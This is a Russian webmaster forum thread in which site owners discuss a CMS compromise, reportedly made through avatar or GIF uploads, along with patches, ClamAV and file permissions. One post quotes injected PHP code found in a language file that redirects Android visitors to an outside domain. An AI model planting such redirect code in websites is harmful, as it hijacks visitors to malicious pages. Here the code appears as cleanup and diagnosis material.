- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
спасибо топику, удалил сразу левых пользователей, но у меня видимо или не смогли, либо не успели нигде аватарку залить, хотя теперь уже патч новый я залил.
До этого не стояло и потом по логам сервера спалил, что пытались проспамить и поломать его, но так как все на сервере, видимо не удалось это сделать
Точно, и взламывали разные версии, через аватарку
Если про 9.6...
1. Это факт был в логах зафиксирован на 9.6 или это наугад вывод только потому, что человек с таким ником был зарегистрирован?
Я в этом топике ни одного куска лога не увидел, подтверждающий, что 9.6 взломали именно через аву..
2. Для 9.6 было выпущено три баг-фикса. Все установлены на сайте?
Про нуллы никто никакой гарантии не даст, поэтому и говорить про них нет смысла.
На оф. сайте на эту тему паниковали те, у кого либо патчи не стояли, либо у кого уже 9.7 стояла, либо до кучи сайты с дырявыми модулями. Некоторые, кстати, патчи не ставили только потому, что у них модули переставали работать, т.е. сознательно шли на "подрыв"... :)
bunina
как-то так, потому что бот регился приблизительно 8-ого января, а ломали(менялась дата файлов) через дней 10
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?
http://www.clamav.net/lang/ru/about/
А у меня везде этот сайт в моб версии.
Уже все файлы перелапалтил, удалил много кода, но так и не нашел оставшиеся...
У кого ещё был код с этим сайтом? Какие файлы правили?
refresh-browser.00xff.net
Вот такой код
if(stripos($_SERVER['HTTP_USER_AGENT'],"Android")!==false)
{header('Location: http://refresh-browser.00xff.net/');exit;}
Нашел последний код.
По этому пути был
/language/Russian/website.lng
если на сайте закрыть регистрацию новых пользователей, то проблема решится?
если на сайте закрыть регистрацию новых пользователей, то проблема решится?
нет :) попытаться убежать от проблемы != её решить.
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?
Почему нет, только не ориентируйтесь на него полностью, он может быть полезным сигнализатором того, что у вас есть проблемы с вредоносными кодами.
Если сами не справляетесь не стоит делать какие-то ограничения по скрипту, лучше всего выяснить источник, стучите проверим на вирусы + дадим рекомендации!
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?
Можно, но это не панацея... Он больше предназначен для защиты файлов сервера, а не файлов конкретного сайта неизвестно какой cms.
если на сайте закрыть регистрацию новых пользователей, то проблема решится?
Нет, это зависит от того, кому разрешено публиковать новости. Ведь взломы идут через файлы, поддерживающие анимацию, т.е. gif.
А у меня везде этот сайт в моб версии.
Уже все файлы перелапалтил, удалил много кода, но так и не нашел оставшиеся...
У кого ещё был код с этим сайтом? Какие файлы правили?
Стесняюсь спросить... У вас основное направление сайта - именно WEB, а не для мобильных устройств? Вы когда сайт устанавливали права на файлы мобильного шаблона (включая htaccess шаблона для мобильной версии) тоже выставляли как указано в документации или продинамили за ненадобностью?